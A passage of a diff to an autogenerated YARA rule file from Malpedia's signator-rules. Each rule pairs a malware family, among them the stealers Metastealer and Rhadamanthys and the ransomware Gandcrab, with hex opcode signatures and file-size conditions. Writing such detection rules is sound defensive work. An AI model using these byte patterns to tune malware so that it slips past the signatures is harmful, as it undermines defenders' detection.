+		$sequence_0 = { 83c004 8901 83c014 8902 6681380b01 7511 }
+		$sequence_1 = { 8b442434 83c410 8b8088000000 85c0 }
+		$sequence_2 = { c744246044000000 ff15???????? 8be8 85ed 0f8494000000 8bbc2488000000 }
+		$sequence_3 = { 51 50 8b442420 50 ff15???????? }
+		$sequence_4 = { 8d7e08 f7c2feffffff 767a 668b07 8bc8 81e100f00000 6681f90030 }
+		$sequence_5 = { ffd6 5e c20400 8b15???????? }
+		$sequence_6 = { 8b35???????? 48 7457 48 742b }
+		$sequence_7 = { f3ab 66ab aa 8b442410 83c9ff 8b5008 33c0 }
+		$sequence_8 = { 5e c20400 8b15???????? 68???????? 52 }
+		$sequence_9 = { 03ca c1e80c 51 50 68???????? }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 344064
 }
-rule MALPEDIA_Win_Veletrix_Auto : FILE
+rule MALPEDIA_Win_Gandcrab_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a5f5b762-13c6-553b-b699-839d4e6ceb4f"
+		id = "5425f9cd-8fb4-510e-a39f-093e7eb655d2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.veletrix"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.veletrix_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gandcrab_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "caf3f0b619f428452505d9ee8537497d80964f351312a5e0d2c1e4059a2feec7"
+		logic_hash = "65a176078bb1690a98a0fbd0a289d5aa1233664bdaee132644de05bfc651c8a8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106767,32 +107154,32 @@ rule MALPEDIA_Win_Veletrix_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7408 488bc2 e9???????? 4d3bc4 0f84d9000000 8b7500 498b9cf6c0920100 }
-		$sequence_1 = { f20f59ee f20f5ce9 f2410f1004c1 488d1576860000 f20f1014c2 }
-		$sequence_2 = { 85c0 742a 488bc5 4c8d05f5250100 488bcd 48c1f906 83e03f }
-		$sequence_3 = { e8???????? 33db 8bf8 85c0 0f8453020000 4c8d2d461a0100 448bf3 }
-		$sequence_4 = { 4c8d0d057c0000 c5f359c1 c5fb101d???????? c5fb102d???????? c4e2f1a91d???????? c4e2f1a92d???????? f20f10e0 }
-		$sequence_5 = { c7459856697274 488bcb c7459c75616c50 4c8be0 c745a0726f7465 }
-		$sequence_6 = { e8???????? 488b8f90000000 483b0d???????? 7417 488d05243d0100 }
-		$sequence_7 = { 4c8d4c2448 488b4f10 41b840000000 ff542430 8b4f04 ba00080000 }
-		$sequence_8 = { 48894df7 488945ef 488d0d8668ffff 83e03f 458be9 4d03e8 4c8945df }
-		$sequence_9 = { 4c896daf 49c1fc06 4c8d34c0 4a8b84e100970100 4a8b44f028 }
+		$sequence_0 = { 03c3 8d5e04 03d8 837f4800 741b ff7750 ff15???????? }
+		$sequence_1 = { ff777c ff15???????? ff7778 8bf0 ff15???????? }
+		$sequence_2 = { ff15???????? ff7728 8bf0 ff15???????? 03c3 8d5e04 }
+		$sequence_3 = { ff15???????? 03c3 8d5e04 03d8 837f3000 }
+		$sequence_4 = { ff15???????? ff7734 8bf0 ff15???????? 03c3 8d5e04 }
+		$sequence_5 = { 03c3 8d5e04 03d8 837f3000 741b }
+		$sequence_6 = { 5f 66894c46fe 8bc6 5e }
+		$sequence_7 = { ff15???????? ff7778 8bf0 ff15???????? 03c3 }
+		$sequence_8 = { ff15???????? 03c3 8d5e04 03d8 837f3c00 741b ff7744 }
+		$sequence_9 = { 741b ff777c ff15???????? ff7778 8bf0 }
 
 	condition:
-		7 of them and filesize < 234496
+		7 of them and filesize < 1024000
 }
-rule MALPEDIA_Win_Flagpro_Auto : FILE
+rule MALPEDIA_Win_Unidentified_091_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "df493d50-e377-536e-a031-d239af918cf3"
+		id = "43cbe43d-9747-5a0c-bb40-dd9c7c940d50"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flagpro"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.flagpro_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_091"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_091_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "8734d591635985c73e20c9ca4d9912448a0aab9867cea544ed16d714554a9f18"
+		logic_hash = "4634e6f2999913eaf2a083116e36bae941dd940a5cf81991fb84c6cc55fc0d2d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106806,32 +107193,32 @@ rule MALPEDIA_Win_Flagpro_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4501 50 e8???????? 8bf8 83c420 }
-		$sequence_1 = { 8b03 eb02 8bc3 55 8d2c3f }
-		$sequence_2 = { ffd5 68???????? e8???????? 8b44241c }
-		$sequence_3 = { c684249400000002 8b442448 8b08 8d542428 52 50 8b4120 }
-		$sequence_4 = { 8b9180000000 50 ffd2 8b442418 }
-		$sequence_5 = { 8b4e18 53 57 8bf8 8d5e04 83f908 7204 }
-		$sequence_6 = { ffd2 47 3b7c243c 897c2450 0f8c03feffff e9???????? 8b44241c }
-		$sequence_7 = { c744244400000000 a1???????? 8b500c b9???????? ffd2 8d7010 8974241c }
-		$sequence_8 = { f7e2 8bea c1ed06 45 68e8030000 }
-		$sequence_9 = { e8???????? 33f6 eb06 8b1d???????? b8???????? 8d5002 }
+		$sequence_0 = { 81e1ff00ff00 0bd1 895618 418b481c 8bd1 c1ca08 c1c108 }
+		$sequence_1 = { c0e904 8885f8000000 888df9000000 0fb64a1d 0fb6c1 c0e904 240f }
+		$sequence_2 = { e8???????? 85c0 743c 48ffc3 483b5c2430 72c4 488bcf }
+		$sequence_3 = { 8b442448 418bd1 4133d2 c1ca10 03fa 893c24 448bc7 }
+		$sequence_4 = { c1cd02 c1e718 418bc0 c1c005 4103c2 4489642418 03d0 }
+		$sequence_5 = { 85c0 0f8eee000000 488d0d49421600 48894d00 48215508 48215510 ffc0 }
+		$sequence_6 = { e8???????? 488bd3 488bcf 4c8bf0 8b30 c70000000000 e8???????? }
+		$sequence_7 = { f30f58d0 0f57c0 0fc6d200 0f51ca 410fc2d304 0fc2c104 0f5ed9 }
+		$sequence_8 = { 4c894507 48894d0f e9???????? c74424285a0a0000 ba50000000 4c89542420 41b966010000 }
+		$sequence_9 = { c784248000000001000000 eb32 c7442420f6010000 baa6000000 4c8d0db8a71100 b906000000 448d42fc }
 
 	condition:
-		7 of them and filesize < 1411072
+		7 of them and filesize < 5777408
 }
-rule MALPEDIA_Win_Tmanger_Auto : FILE
+rule MALPEDIA_Win_Sslmm_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "790b1a6e-9331-5562-a8a4-895a06f4f290"
+		id = "d8086894-ce35-51e5-80fd-c0d5178aba78"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tmanger"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tmanger_auto.yar#L1-L110"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sslmm_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "747dcecd7ac42c73ae2cafbcc412928abf59ab04c5fc33f549cfda9aa11d6334"
+		logic_hash = "a85823710a9c9f3b9c72213ada570b2364c16fc9f2cafb50a35e2a98adedaa0a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106845,32 +107232,32 @@ rule MALPEDIA_Win_Tmanger_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c74161d47bdb0f c741651f013f62 c74169388b8e92 c7416d9b14f6a0 }
-		$sequence_1 = { c7416d9b14f6a0 c7417180fcd6bb c74175d7401d36 c7417958fffa19 }
-		$sequence_2 = { c7412425d933d1 c7412861fdc72a c7412cdf9134d2 c74130324d251d }
-		$sequence_3 = { c7415d382cd7bd c74161d47bdb0f c741651f013f62 c74169388b8e92 }
-		$sequence_4 = { c741651f013f62 c74169388b8e92 c7416d9b14f6a0 c7417180fcd6bb c74175d7401d36 }
-		$sequence_5 = { c741594d68b93a c7415d382cd7bd c74161d47bdb0f c741651f013f62 c74169388b8e92 c7416d9b14f6a0 c7417180fcd6bb }
-		$sequence_6 = { c74145aed72316 c74149ff663a9d c7414dd22a7e91 c741510f9f2997 c7415565449eac }
-		$sequence_7 = { c741510f9f2997 c7415565449eac c741594d68b93a c7415d382cd7bd }
-		$sequence_8 = { c7410c16d9fdf8 c741103a71c135 c74114c2a02ab0 c74118d95dc845 }
-		$sequence_9 = { c7412861fdc72a c7412cdf9134d2 c74130324d251d c74134375ec19d c7413893c82e55 }
+		$sequence_0 = { 55 50 51 8bcb e8???????? 85c0 0f854d010000 }
+		$sequence_1 = { 51 03ee 55 50 e8???????? 8b442478 }
+		$sequence_2 = { 8bca 83e103 f3aa 8b842480000000 8b4c2420 2bc6 }
+		$sequence_3 = { 5b 81c45c020000 c3 8b1d???????? 68???????? 56 }
+		$sequence_4 = { 81ecc8000000 53 8bd9 8b8c24d8000000 55 }
+		$sequence_5 = { 51 6a00 8d93dc000000 50 52 }
+		$sequence_6 = { 33c0 5e 81c4ac010000 c21000 }
+		$sequence_7 = { ff5204 33c0 5e c20c00 6a00 }
+		$sequence_8 = { 68c8000000 8bf1 6a00 ffd7 8b1d???????? }
+		$sequence_9 = { 83c404 40 50 53 6aff 57 6a00 }
 
 	condition:
-		7 of them and filesize < 8252416
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Selfmake_Auto : FILE
+rule MALPEDIA_Win_Ground_Peony_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "14e0b71d-d2cd-519a-a7ac-d6d6b6506061"
+		id = "801058db-7b66-5372-8745-75ac698daed8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.selfmake"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.selfmake_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ground_peony"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ground_peony_auto.yar#L1-L113"
 		license_url = "N/A"
-		logic_hash = "08e1e6c97c92f2a3bf3c8dda29bd3cb3a7515a9d0a9d08d73c9a2b096d151fb4"
+		logic_hash = "e6e32f0220bb10dd7446439a2221f39d91c5ad68ccd69dfaaf804fe3b4efdc99"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106884,32 +107271,32 @@ rule MALPEDIA_Win_Selfmake_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? c644247801 837c244810 720d }
-		$sequence_1 = { c1e902 8bf2 f3a5 8bc8 83e103 6a0a f3a4 }
-		$sequence_2 = { 68???????? e8???????? 83c040 50 e8???????? 8b5608 8b4254 }
-		$sequence_3 = { 57 8d7c2414 e8???????? 83c404 83f8ff 751d 68???????? }
-		$sequence_4 = { 3bf3 760a 2bf3 eb08 8b5c246c ebe7 }
-		$sequence_5 = { 83c408 6818020000 6a00 8d8de0fdffff 51 e8???????? 83c40c }
-		$sequence_6 = { 8be8 6a1f 55 ff15???????? }
-		$sequence_7 = { 80387f 0f844e010000 8bc2 83f910 }
-		$sequence_8 = { 51 8b95a0fbffff 52 ff15???????? 8945f8 837df800 }
-		$sequence_9 = { 33c0 e9???????? 8d95c0fbffff 52 }
+		$sequence_0 = { 488d15c28a0000 488d0db38a0000 e8???????? 488b4308 833800 }
+		$sequence_1 = { 4833c4 4889842460050000 488bd1 4d8d4310 498d8bd8fbffff ff15???????? }
+		$sequence_2 = { eb10 488bc8 ff15???????? 488d0d251e0100 }
+		$sequence_3 = { e8???????? 48b8d2bc1a37d2bc1a37 41b802000000 4889842420080000 8bd5 4889842428080000 }
+		$sequence_4 = { ff15???????? 33d2 488d4c2450 41b804010000 e8???????? 41b804010000 }
+		$sequence_5 = { f20f102d???????? f20f590d???????? f20f59ee f20f5ce9 f2410f1004c1 488d1536830000 }
+		$sequence_6 = { 4883c428 c3 488d15878e0000 488d0d808d0000 }
+		$sequence_7 = { 8b0a e8???????? 90 488d1d9e2f0100 }
+		$sequence_8 = { e8???????? eb22 488d0da51a0100 e8???????? }
+		$sequence_9 = { 4883ec20 488bda 4c8d0def960000 8bf9 }
 
 	condition:
-		7 of them and filesize < 932864
+		7 of them and filesize < 217088
 }
-rule MALPEDIA_Win_Hodur_Auto : FILE
+rule MALPEDIA_Win_Cargobay_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "529f3e13-6dbd-5bfd-9d2e-8112cb176080"
+		id = "d6e48bf6-04f2-5926-86cf-d6b3d1d19c9e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hodur"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hodur_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cargobay"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cargobay_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "52f28b8a0f887df21ab70c260b17a2f99e348211a9b139c663c0b81c4937fcbf"
+		logic_hash = "78bad24f78416452973bfe57bb2d3dc8c78eea72265f4a6384a2c196eab74e59"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106923,32 +107310,32 @@ rule MALPEDIA_Win_Hodur_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 83c414 0f2805???????? 833d????????0a 0f11442468 66c74424781b3e c644247a00 }
-		$sequence_1 = { 8b15???????? 8b3d???????? 8d42ff 0fafc2 83e001 83ff0a 7c15 }
-		$sequence_2 = { c684243801000000 7c0f 8d48ff 0fafc8 83e101 0f85a0260000 8d8c2430010000 }
-		$sequence_3 = { 7c0b 8d41ff 0fafc1 83e001 752a 6a5c 55 }
-		$sequence_4 = { c74424080c043500 7c14 a1???????? 8d48ff 0fafc8 83e101 0f85b10b0000 }
-		$sequence_5 = { 6a5c 8d842454040000 50 e8???????? 83c408 833d????????0a 89c7 }
-		$sequence_6 = { c78424e0000000b9ffceff 7c15 8b0d???????? 8d51ff 0fafd1 83e201 0f85ab0a0000 }
-		$sequence_7 = { ebfe 833d????????0a 66c784249a0000000000 7c12 a1???????? 8d48ff 0fafc8 }
-		$sequence_8 = { 7c0d 8d50ff 0fafd0 83e201 7402 ebfe e8???????? }
-		$sequence_9 = { 75f4 c6410d00 e8???????? 53 ff75e4 ffd0 833d????????0a }
+		$sequence_0 = { e8???????? 0f0b 4883ec28 4889c8 488d0d735d0e00 48894c2420 41b900010000 }
+		$sequence_1 = { e8???????? 48894308 b801000000 ebd3 4881ec88000000 488d442428 488910 }
+		$sequence_2 = { e8???????? 4889f1 89c2 4883c420 5e e9???????? 56 }
+		$sequence_3 = { e8???????? 488d9424a0000000 440f294a10 440f2902 4c8db424e0000000 4c89f1 4989f8 }
+		$sequence_4 = { e9???????? 89f9 4429e1 488b742430 8d5601 4585e4 410f94c0 }
+		$sequence_5 = { 4c8ba424c8000000 4889f1 e8???????? 4885c0 7446 4989d0 4c89f1 }
+		$sequence_6 = { eb0d 488908 e9???????? 440fb76734 4929d4 488d7738 31ed }
+		$sequence_7 = { 49c1e104 31c0 4939c1 740b 41833c0000 488d4010 74f0 }
+		$sequence_8 = { c6455e00 4c8d05ed010900 4889e9 488d5548 e8???????? 31ff 4885f6 }
+		$sequence_9 = { e8???????? 4889e9 4c89ea e8???????? e9???????? 488d1512bb1200 488dbc24f0020000 }
 
 	condition:
-		7 of them and filesize < 1067008
+		7 of them and filesize < 3432448
 }
-rule MALPEDIA_Win_Gameover_Dga_Auto : FILE
+rule MALPEDIA_Win_Rhadamanthys_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "03fc91af-7fd0-5c49-806f-66baee40bb34"
+		id = "fbc76f02-e283-5cc2-95ab-feddb32988f8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gameover_dga_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rhadamanthys_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "0d50d6a34d24e697f3e47548c11296361a501bf8307c9f90af33f306f5bb9e63"
+		logic_hash = "9730ed3bce4b206712bfc32009b2e0a70bda3b8b9f39f72ed960449e1927c991"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106962,32 +107349,32 @@ rule MALPEDIA_Win_Gameover_Dga_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 884617 33c0 40 e9???????? 8a4601 33db 8b6c2434 }
-		$sequence_1 = { 8b13 8bcb 6a01 57 56 ff742420 ff742420 }
-		$sequence_2 = { 8bf8 83cdff 3bfd 7504 8bc5 eb42 }
-		$sequence_3 = { 55 8bac2434010000 56 57 8bf9 8b4508 85c0 }
-		$sequence_4 = { 39442414 0f85eb060000 8b84245c010000 41 894c2420 40 50 }
-		$sequence_5 = { 85db 7417 6af6 6a01 ff742434 ffd3 85c0 }
-		$sequence_6 = { ff7064 ffd6 85c0 0f8513010000 a1???????? 68???????? ff7064 }
-		$sequence_7 = { 8b4c2424 b301 8901 5d 8bce e8???????? }
-		$sequence_8 = { 8bc2 83c204 3b54241c 7725 8a5c2428 8818 8a5c2413 }
-		$sequence_9 = { 0f851f010000 8b442414 8d542428 52 53 ff742450 8b08 }
+		$sequence_0 = { ff7308 03c6 50 8b03 }
+		$sequence_1 = { 8a01 84c0 7416 8b542408 69d293010001 }
+		$sequence_2 = { 33d0 41 89542408 ebe4 }
+		$sequence_3 = { 7416 8b542408 69d293010001 0fb6c0 33d0 41 }
+		$sequence_4 = { 8b542408 69d293010001 0fb6c0 33d0 41 89542408 ebe4 }
+		$sequence_5 = { 7416 8b542408 69d293010001 0fb6c0 33d0 }
+		$sequence_6 = { 84c0 7416 8b542408 69d293010001 0fb6c0 }
+		$sequence_7 = { 7416 8b542408 69d293010001 0fb6c0 33d0 41 89542408 }
+		$sequence_8 = { 84c0 7416 8b542408 69d293010001 0fb6c0 33d0 }
+		$sequence_9 = { 84c0 7416 8b542408 69d293010001 }
 
 	condition:
-		7 of them and filesize < 540672
+		7 of them and filesize < 1111040
 }
-rule MALPEDIA_Win_Bumblebee_Auto : FILE
+rule MALPEDIA_Win_Winordll64_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "51e7861d-d3b9-5cdb-81c5-a532ba2bf356"
+		id = "42d58eb8-636f-5c90-824f-a4029c096b45"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bumblebee"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bumblebee_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winordll64"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.winordll64_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "55275cb4405b1783096501f885fe54bb72513b66b06e891fc6760c0a6547ff81"
+		logic_hash = "ff8a5b9c7eb1fcfe5982c5ada9af48d2cc2fd7ebb77ddf0083a9bd3e03ee5a02"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107001,32 +107388,32 @@ rule MALPEDIA_Win_Bumblebee_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488bd5 4889442428 498bce 488364242000 }
-		$sequence_1 = { 85c0 783c 488b9508030000 4885d2 }
-		$sequence_2 = { 4885c0 0f84b5000000 488d4c2430 41b900100000 48894c2420 4c8bc3 498bce }
-		$sequence_3 = { 33d2 488b4dc8 e8???????? 488b4dc8 }
-		$sequence_4 = { 90 ba38000000 488bcb e8???????? 90 }
-		$sequence_5 = { 4885f6 0f84ff000000 488b05???????? 4885c0 0f84ef000000 488d4c2430 41b900100000 }
-		$sequence_6 = { 488364242000 ffd7 8bc8 ffd3 }
-		$sequence_7 = { 488bd8 ff15???????? 488bcf 488945e5 }
-		$sequence_8 = { 488364242000 ffd7 8bc8 ffd3 4c8d5c2460 498b5b20 498b6b28 }
-		$sequence_9 = { ff15???????? 488d4c2438 33d2 48894c2420 448d4f30 }
+		$sequence_0 = { 488b55d0 488364242000 448bc1 4c8d4d48 498bcc ff15???????? 48635538 }
+		$sequence_1 = { 4c8d05c8c40000 498bd4 488bcd e8???????? 85c0 }
+		$sequence_2 = { 75f7 488bcf e8???????? 498b0c24 4585ed }
+		$sequence_3 = { 488bcf ff15???????? 85c0 0f8575ffffff 488bcf ff15???????? b8c0020000 }
+		$sequence_4 = { e8???????? 4c8d5c2430 4c895c2420 4c8d4c2438 41b807000000 488b442440 }
+		$sequence_5 = { be08780000 8bce e8???????? 488bf8 4885c0 0f8422010000 48ffce }
+		$sequence_6 = { 488d5547 488d4def 4c895d47 e8???????? 4c8d1d9b4a0000 488d150c640000 488d4def }
+		$sequence_7 = { 48ffc1 483bca 72f0 458bc7 }
+		$sequence_8 = { 418800 49ffc0 49ffc3 41d1ea 418b03 488b6c2450 be00000080 }
+		$sequence_9 = { 488d542458 488d4c2428 e8???????? 4c8d1d12e50000 4c895c2428 }
 
 	condition:
-		7 of them and filesize < 4825088
+		7 of them and filesize < 278528
 }
-rule MALPEDIA_Win_Metastealer_Auto : FILE
+rule MALPEDIA_Win_Redyms_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d224b589-7615-5bc0-8bb6-5706cda78332"
+		id = "ef628f44-574a-5627-8d8b-734217cd0062"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.metastealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.metastealer_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redyms"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.redyms_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "6cb10cffce7c1599b69c9e05c260560e4bdcb2bc8aa657b55f875ee3bb8ed71d"
+		logic_hash = "332ef19bb997044700a2b380446c47adf654ddb5c63453028d068b88131edb5b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107040,91 +107427,71 @@ rule MALPEDIA_Win_Metastealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f30f59c3 f30f584104 f30f114104 0f28c1 f30f584108 f30f584918 f30f59c3 }
-		$sequence_1 = { f3a5 68???????? 66a5 c680b600000000 e8???????? 68???????? e8???????? }
-		$sequence_2 = { ffb6a8000000 8d86d8000000 50 56 e8???????? 83c410 f7d8 }
-		$sequence_3 = { f30f59cb f30f5c662c f30f101d???????? f30f5c4e28 f30f1150f8 f30f59e2 f30f59ca }
-		$sequence_4 = { ff7624 e8???????? 83c404 894654 85c0 7412 0f57c0 }
-		$sequence_5 = { f30f5dc3 f30f107804 f30f102d???????? f20f1035???????? f30f59d3 f30f59c5 f30f5ed7 }
-		$sequence_6 = { f20f101d???????? f20f1025???????? f20f102d???????? f20f1035???????? f20f103d???????? 8b5508 8b45fc }
-		$sequence_7 = { ffd0 8bd8 83c40c 807d0c00 899f88010000 895df8 c703???????? }
-		$sequence_8 = { e8???????? 6a02 8d4704 83c302 50 53 e8???????? }
-		$sequence_9 = { ffd0 83c404 85c0 7423 8b8690010000 80781100 74e8 }
+		$sequence_0 = { c745d800000000 8b7dd8 56 6a00 ff15???????? }
+		$sequence_1 = { 53 03f7 56 57 e8???????? 83c40c }
+		$sequence_2 = { 2bf7 03c7 83ee02 56 8d540802 52 53 }
+		$sequence_3 = { b8???????? ffd0 898590feffff 85c0 }
+		$sequence_4 = { 8b856cfdffff 50 ff15???????? 6a09 8d8d74feffff 51 68???????? }
+		$sequence_5 = { 8b0f 014b2c 8b4b2c 85c0 7571 }
+		$sequence_6 = { 85ff 7433 8b95ecfeffff 83c2fc }
+		$sequence_7 = { 740b 50 53 ff15???????? 50 ffd6 8b45d4 }
+		$sequence_8 = { 6a00 68???????? 68???????? 51 56 }
+		$sequence_9 = { 8bf0 85f6 740c 8b550c 57 52 56 }
 
 	condition:
-		7 of them and filesize < 26230784
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Sisfader_Auto : FILE
+rule MALPEDIA_Win_Unidentified_111_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a0cdd7ba-37f5-5dee-9bd0-dfe8ed58e119"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sisfader_auto.yar#L1-L285"
+		id = "761c3c1a-627b-5adf-b1c2-f96f11c05a94"
+		date = "2023-12-06"
+		modified = "2023-12-08"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_111_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "d369a40cd08ca7aac194db42ed12df65df4a56409fba20e45dda5f2780e9b9bf"
+		logic_hash = "8a86a6eb9509e0a5b4e912cde53abfcabb23f3644fc565d69ca8396c5dc5d7c9"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20231130"
+		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
+		malpedia_version = "20230808"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 85c0 b91d000000 0f44d9 }
-		$sequence_1 = { 741f 33c0 85c9 7419 }
-		$sequence_2 = { 8905???????? c705????????00000000 8b442440 8905???????? }
-		$sequence_3 = { ff15???????? 85c0 7e08 03d8 3bdf 7c98 }
-		$sequence_4 = { 33c0 83f801 7425 baffffffff }
-		$sequence_5 = { 85c0 753e 8d47dc 8903 83f824 723b }
-		$sequence_6 = { c705????????10000000 8b442430 8905???????? c705????????07000000 }
-		$sequence_7 = { eb5b 837d0800 751f 8b451c 50 8b4d18 }
-		$sequence_8 = { 8b4508 8b4808 51 ff15???????? 83c408 8945e0 }
-		$sequence_9 = { 837c245000 7405 e9???????? 83bc248000000000 7539 }
-		$sequence_10 = { 837c245000 7402 eb12 c744245401000000 33c0 }
-		$sequence_11 = { 85c0 7502 eb71 8b45fc 8b08 }
-		$sequence_12 = { c7430438020000 66837c247c2e 751f 0fb744247e 6685c0 0f8496010000 6683f82e }
-		$sequence_13 = { ff15???????? 83c414 8945d8 837dd800 }
-		$sequence_14 = { 8b5118 52 8b45f4 8b4830 51 ff15???????? }
-		$sequence_15 = { ff15???????? 8945f8 837df800 7402 eb5b 837d0800 }
